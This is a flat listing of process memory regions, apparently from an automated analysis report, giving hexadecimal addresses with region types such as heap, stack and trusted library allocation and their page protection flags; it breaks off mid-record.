13E8000
|
heap
|
page read and write
|
||
2FB0000
|
heap
|
page read and write
|
||
7FF849257000
|
trusted library allocation
|
page read and write
|
||
7FF848EBC000
|
trusted library allocation
|
page execute and read and write
|
||
28E4F4BF000
|
trusted library allocation
|
page read and write
|
||
154F000
|
heap
|
page read and write
|
||
C48000
|
heap
|
page read and write
|
||
206ED341000
|
heap
|
page read and write
|
||
7FF848FF0000
|
trusted library allocation
|
page execute and read and write
|
||
1B520000
|
heap
|
page read and write
|
||
20690424000
|
trusted library allocation
|
page read and write
|
||
7FF849230000
|
trusted library allocation
|
page read and write
|
||
130A8000
|
trusted library allocation
|
page read and write
|
||
BC5000
|
heap
|
page read and write
|
||
20681868000
|
trusted library allocation
|
page read and write
|
||
1B14705B000
|
trusted library allocation
|
page read and write
|
||
2604000
|
trusted library allocation
|
page read and write
|
||
28E5E2D1000
|
trusted library allocation
|
page read and write
|
||
7FF849270000
|
trusted library allocation
|
page read and write
|
||
206ECC30000
|
trusted library allocation
|
page read and write
|
||
C535A76000
|
stack
|
page read and write
|
||
1B14F014000
|
heap
|
page read and write
|
||
C0A000
|
heap
|
page read and write
|
||
2056803A000
|
trusted library allocation
|
page read and write
|
||
7FF848F20000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848ED6000
|
trusted library allocation
|
page read and write
|
||
8BC000
|
heap
|
page read and write
|
||
943000
|
heap
|
page read and write
|
||
155A000
|
heap
|
page read and write
|
||
189F000
|
stack
|
page read and write
|
||
28E5E2E1000
|
trusted library allocation
|
page read and write
|
||
206ED561000
|
heap
|
page read and write
|
||
2A2C92C2000
|
trusted library allocation
|
page read and write
|
||
2A2BA882000
|
trusted library allocation
|
page read and write
|
||
1B134F60000
|
trusted library allocation
|
page read and write
|
||
1C23E000
|
stack
|
page read and write
|
||
2A2C942E000
|
trusted library allocation
|
page read and write
|
||
7FF849000000
|
trusted library allocation
|
page read and write
|
||
78A000
|
heap
|
page read and write
|
||
1BA2E000
|
stack
|
page read and write
|
||
2A2C943C000
|
trusted library allocation
|
page read and write
|
||
7FF849270000
|
trusted library allocation
|
page read and write
|
||
D55000
|
heap
|
page read and write
|
||
7FF848EB6000
|
trusted library allocation
|
page read and write
|
||
2A2C9272000
|
trusted library allocation
|
page read and write
|
||
2069025E000
|
trusted library allocation
|
page read and write
|
||
7FF84917C000
|
trusted library allocation
|
page read and write
|
||
7FF849100000
|
trusted library allocation
|
page read and write
|
||
FDA000
|
heap
|
page read and write
|
||
7FF848EE6000
|
trusted library allocation
|
page execute and read and write
|
||
EE0000
|
heap
|
page read and write
|
||
20681E21000
|
trusted library allocation
|
page read and write
|
||
7FF848EC0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
1BFFB000
|
stack
|
page read and write
|
||
30EE000
|
stack
|
page read and write
|
||
205683DF000
|
trusted library allocation
|
page read and write
|
||
2056820A000
|
trusted library allocation
|
page read and write
|
||
12BA3000
|
trusted library allocation
|
page read and write
|
||
206ED67C000
|
heap
|
page read and write
|
||
2A2C92CB000
|
trusted library allocation
|
page read and write
|
||
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
7FF848F25000
|
trusted library allocation
|
page execute and read and write
|
||
20568340000
|
trusted library allocation
|
page read and write
|
||
1BCDD000
|
stack
|
page read and write
|
||
124DD000
|
trusted library allocation
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
206ED68D000
|
heap
|
page read and write
|
||
95D000
|
heap
|
page read and write
|
||
7FF84911F000
|
trusted library allocation
|
page read and write
|
||
7FF849168000
|
trusted library allocation
|
page read and write
|
||
2A2C9107000
|
trusted library allocation
|
page read and write
|
||
1B138A15000
|
trusted library allocation
|
page read and write
|
||
9E8F17F000
|
stack
|
page read and write
|
||
DDC000
|
heap
|
page read and write
|
||
2056807E000
|
trusted library allocation
|
page read and write
|
||
1420000
|
heap
|
page read and write
|
||
1DB1AEF3000
|
trusted library allocation
|
page read and write
|
||
7FF848F00000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848F94000
|
trusted library allocation
|
page read and write
|
||
28E4F5E7000
|
trusted library allocation
|
page read and write
|
||
1B8F2000
|
heap
|
page read and write
|
||
1B6FF000
|
heap
|
page read and write
|
||
1B147036000
|
trusted library allocation
|
page read and write
|
||
20556132000
|
heap
|
page read and write
|
||
7FF848FF2000
|
trusted library allocation
|
page read and write
|
||
1B146F74000
|
trusted library allocation
|
page read and write
|
||
28E667BC000
|
heap
|
page read and write
|
||
7FF848E18000
|
trusted library allocation
|
page read and write
|
||
1538000
|
heap
|
page read and write
|
||
12C5000
|
heap
|
page read and write
|
||
1B6FE000
|
stack
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page read and write
|
||
7FF849155000
|
trusted library allocation
|
page read and write
|
||
24D0000
|
heap
|
page read and write
|
||
1B14EEF0000
|
heap
|
page execute and read and write
|
||
28E4E77C000
|
trusted library allocation
|
page read and write
|
||
7FF849180000
|
trusted library allocation
|
page read and write
|
||
259F000
|
trusted library allocation
|
page read and write
|
||
1BA63000
|
stack
|
page read and write
|
||
1B5EE000
|
stack
|
page read and write
|
||
2069030C000
|
trusted library allocation
|
page read and write
|
||
26B2000
|
trusted library allocation
|
page read and write
|
||
1DB182D0000
|
heap
|
page read and write
|
||
20568187000
|
trusted library allocation
|
page read and write
|
||
1B58F000
|
stack
|
page read and write
|
||
F1A000
|
heap
|
page read and write
|
||
7FF849190000
|
trusted library allocation
|
page read and write
|
||
C96B38E000
|
stack
|
page read and write
|
||
28E4FA33000
|
trusted library allocation
|
page read and write
|
||
2056801D000
|
trusted library allocation
|
page read and write
|
||
7FF849120000
|
trusted library allocation
|
page read and write
|
||
2A2C93C6000
|
trusted library allocation
|
page read and write
|
||
20568139000
|
trusted library allocation
|
page read and write
|
||
2B2C000
|
trusted library allocation
|
page read and write
|
||
20570591000
|
heap
|
page read and write
|
||
E7F000
|
stack
|
page read and write
|
||
1B79C000
|
heap
|
page read and write
|
||
3B0000
|
heap
|
page read and write
|
||
2A2C92AA000
|
trusted library allocation
|
page read and write
|
||
28E665D9000
|
heap
|
page read and write
|
||
13EF000
|
heap
|
page read and write
|
||
7FF848FF2000
|
trusted library allocation
|
page read and write
|
||
7FF848E03000
|
trusted library allocation
|
page read and write
|
||
1CB0D000
|
stack
|
page read and write
|
||
7FF849158000
|
trusted library allocation
|
page read and write
|
||
7FF848F05000
|
trusted library allocation
|
page execute and read and write
|
||
20568396000
|
trusted library allocation
|
page read and write
|
||
7FF849260000
|
trusted library allocation
|
page read and write
|
||
3299000
|
trusted library allocation
|
page read and write
|
||
12638000
|
trusted library allocation
|
page read and write
|
||
716000
|
heap
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
12431000
|
trusted library allocation
|
page read and write
|
||
1DB1B9E8000
|
trusted library allocation
|
page read and write
|
||
2A2883B000
|
stack
|
page read and write
|
||
12A54000
|
trusted library allocation
|
page read and write
|
||
146C000
|
heap
|
page read and write
|
||
2A2B8BD0000
|
heap
|
page read and write
|
||
7FF8490E6000
|
trusted library allocation
|
page read and write
|
||
20558F5E000
|
trusted library allocation
|
page read and write
|
||
20568259000
|
trusted library allocation
|
page read and write
|
||
12A81000
|
trusted library allocation
|
page read and write
|
||
20568040000
|
trusted library allocation
|
page read and write
|
||
7FF848DF3000
|
trusted library allocation
|
page read and write
|
||
205681BD000
|
trusted library allocation
|
page read and write
|
||
2A70000
|
heap
|
page execute and read and write
|
||
206812A4000
|
trusted library allocation
|
page read and write
|
||
1895000
|
heap
|
page read and write
|
||
7FF848E13000
|
trusted library allocation
|
page read and write
|
||
1B146E84000
|
trusted library allocation
|
page read and write
|
||
1B8A2000
|
heap
|
page read and write
|
||
20568017000
|
trusted library allocation
|
page read and write
|
||
1C500000
|
heap
|
page read and write
|
||
1B134FA5000
|
heap
|
page read and write
|
||
1DB32397000
|
heap
|
page execute and read and write
|
||
7FF848DF4000
|
trusted library allocation
|
page read and write
|
||
28BD000
|
trusted library allocation
|
page read and write
|
||
20690465000
|
trusted library allocation
|
page read and write
|
||
20568225000
|
trusted library allocation
|
page read and write
|
||
1B494000
|
stack
|
page read and write
|
||
124D3000
|
trusted library allocation
|
page read and write
|
||
205680E7000
|
trusted library allocation
|
page read and write
|
||
AC3000
|
heap
|
page read and write
|
||
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
7FF848EB6000
|
trusted library allocation
|
page read and write
|
||
1B146E87000
|
trusted library allocation
|
page read and write
|
||
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849123000
|
trusted library allocation
|
page read and write
|
||
205681F8000
|
trusted library allocation
|
page read and write
|
||
28E666A0000
|
heap
|
page read and write
|
||
12698000
|
trusted library allocation
|
page read and write
|
||
1C03E000
|
stack
|
page read and write
|
||
2608000
|
trusted library allocation
|
page read and write
|
||
131FD000
|
trusted library allocation
|
page read and write
|
||
AFF000
|
stack
|
page read and write
|
||
1B134E2D000
|
heap
|
page read and write
|
||
1B137E92000
|
trusted library allocation
|
page read and write
|
||
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
12C28000
|
trusted library allocation
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
1BE1E000
|
stack
|
page read and write
|
||
13B8000
|
heap
|
page read and write
|
||
2ACC000
|
trusted library allocation
|
page read and write
|
||
9E8F4BE000
|
stack
|
page read and write
|
||
CC4CE0C000
|
stack
|
page read and write
|
||
850000
|
heap
|
page read and write
|
||
2A2C9257000
|
trusted library allocation
|
page read and write
|
||
28E4FC00000
|
trusted library allocation
|
page read and write
|
||
1B1377ED000
|
trusted library allocation
|
page read and write
|
||
1B146EAD000
|
trusted library allocation
|
page read and write
|
||
788000
|
heap
|
page read and write
|
||
10E0000
|
trusted library allocation
|
page read and write
|
||
124D1000
|
trusted library allocation
|
page read and write
|
||
206EB26C000
|
heap
|
page read and write
|
||
7FF848FA7000
|
trusted library allocation
|
page read and write
|
||
2A28A3D000
|
stack
|
page read and write
|
||
28E4F552000
|
trusted library allocation
|
page read and write
|
||
7FF849250000
|
trusted library allocation
|
page read and write
|
||
1B29E000
|
stack
|
page read and write
|
||
2627000
|
trusted library allocation
|
page read and write
|
||
20559D56000
|
trusted library allocation
|
page read and write
|
||
152A000
|
heap
|
page read and write
|
||
20559880000
|
trusted library allocation
|
page read and write
|
||
2A2B70BD000
|
heap
|
page read and write
|
||
C969DFF000
|
stack
|
page read and write
|
||
1AF2F000
|
stack
|
page read and write
|
||
2A2C92B2000
|
trusted library allocation
|
page read and write
|
||
776000
|
stack
|
page read and write
|
||
20568332000
|
trusted library allocation
|
page read and write
|
||
1B146E6D000
|
trusted library allocation
|
page read and write
|
||
20568038000
|
trusted library allocation
|
page read and write
|
||
2056808A000
|
trusted library allocation
|
page read and write
|
||
20690208000
|
trusted library allocation
|
page read and write
|
||
730000
|
trusted library allocation
|
page read and write
|
||
7FF849256000
|
trusted library allocation
|
page read and write
|
||
20690272000
|
trusted library allocation
|
page read and write
|
||
1B146EE7000
|
trusted library allocation
|
page read and write
|
||
28E5E320000
|
trusted library allocation
|
page read and write
|
||
1B1377F5000
|
trusted library allocation
|
page read and write
|
||
7FF848FB9000
|
trusted library allocation
|
page read and write
|
||
1B147028000
|
trusted library allocation
|
page read and write
|
||
A60000
|
heap
|
page read and write
|
||
1AC1D000
|
stack
|
page read and write
|
||
7FF848FD2000
|
trusted library allocation
|
page read and write
|
||
3430000
|
heap
|
page execute and read and write
|
||
7FF848E13000
|
trusted library allocation
|
page read and write
|
||
1ABD0000
|
trusted library allocation
|
page read and write
|
||
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
2A2B709F000
|
heap
|
page read and write
|
||
2057058B000
|
heap
|
page read and write
|
||
1B146FF3000
|
trusted library allocation
|
page read and write
|
||
C96B30D000
|
stack
|
page read and write
|
||
1BDFC000
|
stack
|
page read and write
|
||
7FF848F20000
|
trusted library allocation
|
page execute and read and write
|
||
12F6000
|
stack
|
page read and write
|
||
1B640000
|
heap
|
page read and write
|
||
12C0000
|
heap
|
page read and write
|
||
C96A17E000
|
stack
|
page read and write
|
||
2510000
|
heap
|
page execute and read and write
|
||
205681D2000
|
trusted library allocation
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
20570586000
|
heap
|
page read and write
|
||
7FF848FA7000
|
trusted library allocation
|
page read and write
|
||
2A2D148E000
|
heap
|
page read and write
|
||
231E000
|
stack
|
page read and write
|
||
7FF848FC2000
|
trusted library allocation
|
page read and write
|
||
7FF848FD0000
|
trusted library allocation
|
page read and write
|
||
25FC000
|
trusted library allocation
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
7FF848E2D000
|
trusted library allocation
|
page execute and read and write
|
||
1B136BF1000
|
trusted library allocation
|
page read and write
|
||
7FF848FB2000
|
trusted library allocation
|
page read and write
|
||
206903AD000
|
trusted library allocation
|
page read and write
|
||
1DB32517000
|
heap
|
page read and write
|
||
2A2C938A000
|
trusted library allocation
|
page read and write
|
||
1A850000
|
trusted library allocation
|
page read and write
|
||
9E8F0FD000
|
unkown
|
page read and write
|
||
7FF8490DF000
|
trusted library allocation
|
page read and write
|
||
2A2C937E000
|
trusted library allocation
|
page read and write
|
||
2056826C000
|
trusted library allocation
|
page read and write
|
||
206901E3000
|
trusted library allocation
|
page read and write
|
||
2A2C942C000
|
trusted library allocation
|
page read and write
|
||
7FF849140000
|
trusted library allocation
|
page read and write
|
||
7FF848FB2000
|
trusted library allocation
|
page read and write
|
||
7FF848FB7000
|
trusted library allocation
|
page read and write
|
||
1B4B0000
|
heap
|
page execute and read and write
|
||
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
7FF849169000
|
trusted library allocation
|
page read and write
|
||
206ED400000
|
heap
|
page read and write
|
||
7FF848F92000
|
trusted library allocation
|
page read and write
|
||
FEE667E000
|
unkown
|
page read and write
|
||
7FF8490B4000
|
trusted library allocation
|
page read and write
|
||
2A2C909B000
|
trusted library allocation
|
page read and write
|
||
790000
|
heap
|
page read and write
|
||
7FF849000000
|
trusted library allocation
|
page read and write
|
||
7FF84924D000
|
trusted library allocation
|
page read and write
|
||
1DB1A205000
|
trusted library allocation
|
page read and write
|
||
206902B4000
|
trusted library allocation
|
page read and write
|
||
205682BD000
|
trusted library allocation
|
page read and write
|
||
7FF848EBC000
|
trusted library allocation
|
page execute and read and write
|
||
BCD000
|
heap
|
page read and write
|
||
8F6000
|
heap
|
page read and write
|
||
1B88E000
|
stack
|
page read and write
|
||
1DB324E7000
|
heap
|
page read and write
|
||
7FF848E13000
|
trusted library allocation
|
page execute and read and write
|
||
20570541000
|
heap
|
page read and write
|
||
7FF848FD2000
|
trusted library allocation
|
page read and write
|
||
BDB000
|
heap
|
page read and write
|
||
1B134FB5000
|
heap
|
page read and write
|
||
7FF849090000
|
trusted library allocation
|
page read and write
|
||
7FF849252000
|
trusted library allocation
|
page read and write
|
||
2A2C91C9000
|
trusted library allocation
|
page read and write
|
||
FEE6E3E000
|
stack
|
page read and write
|
||
90C000
|
heap
|
page read and write
|
||
7FF84910F000
|
trusted library allocation
|
page read and write
|
||
20556220000
|
trusted library allocation
|
page read and write
|
||
205680B5000
|
trusted library allocation
|
page read and write
|
||
2A2D13E8000
|
heap
|
page read and write
|
||
20568181000
|
trusted library allocation
|
page read and write
|
||
1B134F10000
|
trusted library allocation
|
page read and write
|
||
2A2C8FB1000
|
trusted library allocation
|
page read and write
|
||
1B14F04C000
|
heap
|
page read and write
|
||
2510000
|
heap
|
page execute and read and write
|
||
29F0000
|
heap
|
page read and write
|
||
2AD3000
|
trusted library allocation
|
page read and write
|
||
28B4000
|
trusted library allocation
|
page read and write
|
||
206903B1000
|
trusted library allocation
|
page read and write
|
||
2A2B7260000
|
trusted library allocation
|
page read and write
|
||
1DB18460000
|
trusted library allocation
|
page read and write
|
||
7FF849190000
|
trusted library allocation
|
page read and write
|
||
2A2C8FDB000
|
trusted library allocation
|
page read and write
|
||
1B14705F000
|
trusted library allocation
|
page read and write
|
||
5FE000
|
heap
|
page read and write
|
||
DC0000
|
heap
|
page read and write
|
||
7FF849040000
|
trusted library allocation
|
page read and write
|
||
12ACB000
|
trusted library allocation
|
page read and write
|
||
2A2C916A000
|
trusted library allocation
|
page read and write
|
||
206902A1000
|
trusted library allocation
|
page read and write
|
||
AD8000
|
heap
|
page read and write
|
||
1B733000
|
stack
|
page read and write
|
||
1DB1BAD0000
|
trusted library allocation
|
page read and write
|
||
B20000
|
heap
|
page read and write
|
||
A20000
|
heap
|
page read and write
|
||
1AFEE000
|
stack
|
page read and write
|
||
2A2C90DC000
|
trusted library allocation
|
page read and write
|
||
7FF849120000
|
trusted library allocation
|
page read and write
|
||
20567FD3000
|
trusted library allocation
|
page read and write
|
||
124E1000
|
trusted library allocation
|
page read and write
|
||
20570250000
|
trusted library allocation
|
page read and write
|
||
7FF849206000
|
trusted library allocation
|
page read and write
|
||
28E4E0E0000
|
trusted library allocation
|
page read and write
|
||
1B563000
|
stack
|
page read and write
|
||
20570120000
|
heap
|
page read and write
|
||
C535D7E000
|
stack
|
page read and write
|
||
1B6BB000
|
heap
|
page read and write
|
||
206ECCE0000
|
trusted library allocation
|
page read and write
|
||
7FF848FE6000
|
trusted library allocation
|
page read and write
|
||
1B6C4000
|
heap
|
page read and write
|
||
205683DD000
|
trusted library allocation
|
page read and write
|
||
7FF849120000
|
trusted library allocation
|
page read and write
|
||
20568211000
|
trusted library allocation
|
page read and write
|
||
7FF848E2D000
|
trusted library allocation
|
page execute and read and write
|
||
900000
|
heap
|
page read and write
|
||
20567FFF000
|
trusted library allocation
|
page read and write
|
||
12631000
|
trusted library allocation
|
page read and write
|
||
20568183000
|
trusted library allocation
|
page read and write
|
||
1B963000
|
stack
|
page read and write
|
||
2A2C918B000
|
trusted library allocation
|
page read and write
|
||
BE4000
|
heap
|
page read and write
|
||
A50000
|
heap
|
page read and write
|
||
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
7FF849010000
|
trusted library allocation
|
page read and write
|
||
7FF848F9E000
|
trusted library allocation
|
page read and write
|
||
B50000
|
heap
|
page read and write
|
||
1AC5C000
|
stack
|
page read and write
|
||
9E9048E000
|
stack
|
page read and write
|
||
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
1BCF0000
|
heap
|
page execute and read and write
|
||
1BB4F000
|
stack
|
page read and write
|
||
2A2C938E000
|
trusted library allocation
|
page read and write
|
||
7FF848FF4000
|
trusted library allocation
|
page read and write
|
||
7FF848E3D000
|
trusted library allocation
|
page execute and read and write
|
||
C53587E000
|
stack
|
page read and write
|
||
2A2C9380000
|
trusted library allocation
|
page read and write
|
||
126D1000
|
trusted library allocation
|
page read and write
|
||
205681F6000
|
trusted library allocation
|
page read and write
|
||
7FF849040000
|
trusted library allocation
|
page read and write
|
||
660000
|
heap
|
page read and write
|
||
1300000
|
heap
|
page read and write
|
||
7FF849170000
|
trusted library allocation
|
page read and write
|
||
1B14ED25000
|
heap
|
page read and write
|
||
1DB18290000
|
heap
|
page read and write
|
||
1140000
|
heap
|
page read and write
|
||
7FF848FFA000
|
trusted library allocation
|
page read and write
|
||
C95000
|
heap
|
page read and write
|
||
7FF849270000
|
trusted library allocation
|
page read and write
|
||
2A99000
|
trusted library allocation
|
page read and write
|
||
2A2C9313000
|
trusted library allocation
|
page read and write
|
||
2A2C9066000
|
trusted library allocation
|
page read and write
|
||
7FF849080000
|
trusted library allocation
|
page read and write
|
||
13181000
|
trusted library allocation
|
page read and write
|
||
7FF849250000
|
trusted library allocation
|
page read and write
|
||
8FD000
|
heap
|
page read and write
|
||
28E4C4D0000
|
heap
|
page read and write
|
||
2A2C929F000
|
trusted library allocation
|
page read and write
|
||
206ED542000
|
heap
|
page read and write
|
||
386000
|
stack
|
page read and write
|
||
1DB1B1AE000
|
trusted library allocation
|
page read and write
|
||
FEE6ABE000
|
stack
|
page read and write
|
||
7FF849210000
|
trusted library allocation
|
page read and write
|
||
1B14F000000
|
heap
|
page read and write
|
||
7FF848E1B000
|
trusted library allocation
|
page read and write
|
||
BE5000
|
heap
|
page read and write
|
||
1B146C21000
|
trusted library allocation
|
page read and write
|
||
15F0000
|
heap
|
page read and write
|
||
1B7A8000
|
heap
|
page read and write
|
||
7FF848E03000
|
trusted library allocation
|
page execute and read and write
|
||
206ED51C000
|
heap
|
page read and write
|
||
8DA000
|
heap
|
page read and write
|
||
205681C3000
|
trusted library allocation
|
page read and write
|
||
1318D000
|
trusted library allocation
|
page read and write
|
||
206ED504000
|
heap
|
page read and write
|
||
7FF848FC2000
|
trusted library allocation
|
page read and write
|
||
1AF50000
|
heap
|
page read and write
|
||
128C3000
|
trusted library allocation
|
page read and write
|
||
2A2D10F0000
|
heap
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
28E4C340000
|
heap
|
page read and write
|
||
7FF849200000
|
trusted library allocation
|
page read and write
|
||
2069023D000
|
trusted library allocation
|
page read and write
|
||
7FF848EB6000
|
trusted library allocation
|
page read and write
|
||
2A2C9000000
|
trusted library allocation
|
page read and write
|
||
7FF848ED6000
|
trusted library allocation
|
page read and write
|
||
2B0000
|
unkown
|
page readonly
|
||
2A2BA166000
|
trusted library allocation
|
page read and write
|
||
E05000
|
heap
|
page read and write
|
||
7FF848FCA000
|
trusted library allocation
|
page read and write
|
||
10E0000
|
heap
|
page read and write
|
||
7FF848FF0000
|
trusted library allocation
|
page execute and read and write
|
||
1B33E000
|
stack
|
page read and write
|
||
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
1DB325ED000
|
heap
|
page read and write
|
||
205704BE000
|
heap
|
page read and write
|
||
206903BA000
|
trusted library allocation
|
page read and write
|
||
28E500B1000
|
trusted library allocation
|
page read and write
|
||
7FF848FF6000
|
trusted library allocation
|
page read and write
|
||
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
F18000
|
heap
|
page read and write
|
||
1B14F084000
|
heap
|
page read and write
|
||
206810BF000
|
trusted library allocation
|
page read and write
|
||
7FF848EF6000
|
trusted library allocation
|
page execute and read and write
|
||
FEE7A8E000
|
stack
|
page read and write
|
||
2AA2000
|
trusted library allocation
|
page read and write
|
||
CAC000
|
heap
|
page read and write
|
||
2A2C933A000
|
trusted library allocation
|
page read and write
|
||
9E8F7BC000
|
stack
|
page read and write
|
||
7FF848E13000
|
trusted library allocation
|
page execute and read and write
|
||
20568097000
|
trusted library allocation
|
page read and write
|
||
7FF848E03000
|
trusted library allocation
|
page read and write
|
||
5ED000
|
heap
|
page read and write
|
||
271E000
|
stack
|
page read and write
|
||
1B146E2F000
|
trusted library allocation
|
page read and write
|
||
5C0000
|
heap
|
page read and write
|
||
1B6C0000
|
heap
|
page read and write
|
||
205680AB000
|
trusted library allocation
|
page read and write
|
||
20568081000
|
trusted library allocation
|
page read and write
|
||
1B35F000
|
stack
|
page read and write
|
||
1DB1ABD1000
|
trusted library allocation
|
page read and write
|
||
32A2000
|
trusted library allocation
|
page read and write
|
||
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
7FF43B520000
|
trusted library allocation
|
page execute and read and write
|
||
20568015000
|
trusted library allocation
|
page read and write
|
||
2A285F9000
|
stack
|
page read and write
|
||
1645000
|
heap
|
page read and write
|
||
20568189000
|
trusted library allocation
|
page read and write
|
||
1B146F05000
|
trusted library allocation
|
page read and write
|
||
2A2C9399000
|
trusted library allocation
|
page read and write
|
||
9EF000
|
heap
|
page read and write
|
||
7FF848E4B000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849230000
|
trusted library allocation
|
page read and write
|
||
2056825C000
|
trusted library allocation
|
page read and write
|
||
2056823E000
|
trusted library allocation
|
page read and write
|
||
2056817F000
|
trusted library allocation
|
page read and write
|
||
7FF849169000
|
trusted library allocation
|
page read and write
|
||
12823000
|
trusted library allocation
|
page read and write
|
||
F0F000
|
heap
|
page read and write
|
||
20568168000
|
trusted library allocation
|
page read and write
|
||
1B5B5000
|
stack
|
page read and write
|
||
3199000
|
trusted library allocation
|
page read and write
|
||
BA5000
|
heap
|
page read and write
|
||
2A2C919D000
|
trusted library allocation
|
page read and write
|
||
7FF8490A5000
|
trusted library allocation
|
page read and write
|
||
3260000
|
heap
|
page read and write
|
||
1B85C000
|
heap
|
page read and write
|
||
5EA000
|
heap
|
page read and write
|
||
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
7FF848F25000
|
trusted library allocation
|
page execute and read and write
|
||
B00000
|
trusted library section
|
page read and write
|
||
7FF848EC6000
|
trusted library allocation
|
page execute and read and write
|
||
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
1B4EE000
|
stack
|
page read and write
|
||
205682CC000
|
trusted library allocation
|
page read and write
|
||
12F6000
|
stack
|
page read and write
|
||
31F7000
|
trusted library allocation
|
page read and write
|
||
1B147052000
|
trusted library allocation
|
page read and write
|
||
DD8000
|
heap
|
page read and write
|
||
92A000
|
heap
|
page read and write
|
||
2A2D10B0000
|
heap
|
page read and write
|
||
7FF848EB6000
|
trusted library allocation
|
page read and write
|
||
7FF848E0B000
|
trusted library allocation
|
page read and write
|
||
206ECC10000
|
trusted library allocation
|
page read and write
|
||
2A2C939F000
|
trusted library allocation
|
page read and write
|
||
20558158000
|
trusted library allocation
|
page read and write
|
||
CC4C1BC000
|
stack
|
page read and write
|
||
1B14EF20000
|
heap
|
page read and write
|
||
150A000
|
heap
|
page read and write
|
||
7FF849110000
|
trusted library allocation
|
page read and write
|
||
1B136C02000
|
trusted library allocation
|
page read and write
|
||
7FF848E1B000
|
trusted library allocation
|
page read and write
|
||
1B470000
|
trusted library allocation
|
page read and write
|
||
2A2D13AB000
|
heap
|
page read and write
|
||
7FF849200000
|
trusted library allocation
|
page read and write
|
||
149E000
|
heap
|
page read and write
|
||
7FF849220000
|
trusted library allocation
|
page execute and read and write
|
||
28E4C546000
|
heap
|
page read and write
|
||
1B6A4000
|
heap
|
page read and write
|
||
7FF849050000
|
trusted library allocation
|
page read and write
|
||
12584000
|
trusted library allocation
|
page read and write
|
||
20568240000
|
trusted library allocation
|
page read and write
|
||
8D0000
|
heap
|
page read and write
|
||
F03000
|
heap
|
page read and write
|
||
15D6000
|
heap
|
page read and write
|
||
1B146E71000
|
trusted library allocation
|
page read and write
|
||
2A2C9382000
|
trusted library allocation
|
page read and write
|
||
92C000
|
heap
|
page read and write
|
||
DCA000
|
heap
|
page read and write
|
||
7FF848FD0000
|
trusted library allocation
|
page read and write
|
||
20690314000
|
trusted library allocation
|
page read and write
|
||
1B134E13000
|
heap
|
page read and write
|
||
1B990000
|
heap
|
page read and write
|
||
1B137BF1000
|
trusted library allocation
|
page read and write
|
||
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
2A287B6000
|
stack
|
page read and write
|
||
1B2F0000
|
heap
|
page execute and read and write
|
||
7FF848FE2000
|
trusted library allocation
|
page read and write
|
||
7FF848EE6000
|
trusted library allocation
|
page execute and read and write
|
||
2A2D14D8000
|
heap
|
page read and write
|
||
1B684000
|
heap
|
page read and write
|
||
12691000
|
trusted library allocation
|
page read and write
|
||
7FF84926D000
|
trusted library allocation
|
page read and write
|
||
1B147011000
|
trusted library allocation
|
page read and write
|
||
9E8F27A000
|
stack
|
page read and write
|
||
FC7000
|
heap
|
page read and write
|
||
7FF849100000
|
trusted library allocation
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
2A2BA233000
|
trusted library allocation
|
page read and write
|
||
12A88000
|
trusted library allocation
|
page read and write
|
||
28E66530000
|
trusted library allocation
|
page read and write
|
||
2D65000
|
trusted library allocation
|
page read and write
|
||
128CD000
|
trusted library allocation
|
page read and write
|
||
1B14F018000
|
heap
|
page read and write
|
||
FEE7987000
|
stack
|
page read and write
|
||
1DB1B2A0000
|
trusted library allocation
|
page read and write
|
||
12A0D000
|
trusted library allocation
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
7FF848E7C000
|
trusted library allocation
|
page execute and read and write
|
||
20690307000
|
trusted library allocation
|
page read and write
|
||
20567F61000
|
trusted library allocation
|
page read and write
|
||
B40000
|
heap
|
page read and write
|
||
1B8FF000
|
stack
|
page read and write
|
||
205681EE000
|
trusted library allocation
|
page read and write
|
||
326F000
|
trusted library allocation
|
page read and write
|
||
1018000
|
heap
|
page read and write
|
||
1B146F3C000
|
trusted library allocation
|
page read and write
|
||
2A2C9322000
|
trusted library allocation
|
page read and write
|
||
12813000
|
trusted library allocation
|
page read and write
|
||
C96A73B000
|
stack
|
page read and write
|
||
7FF849144000
|
trusted library allocation
|
page read and write
|
||
130AD000
|
trusted library allocation
|
page read and write
|
||
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
7FF848FD4000
|
trusted library allocation
|
page read and write
|
||
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
1595000
|
heap
|
page read and write
|
||
850000
|
heap
|
page read and write
|
||
2FE0000
|
heap
|
page read and write
|
||
888000
|
heap
|
page read and write
|
||
12633000
|
trusted library allocation
|
page read and write
|
||
13EC000
|
heap
|
page read and write
|
||
1B849000
|
heap
|
page read and write
|
||
266D000
|
trusted library allocation
|
page read and write
|
||
A40000
|
heap
|
page read and write
|
||
7FF848E1B000
|
trusted library allocation
|
page read and write
|
||
206EB210000
|
heap
|
page read and write
|
||
F30000
|
trusted library allocation
|
page read and write
|
||
1B146ED4000
|
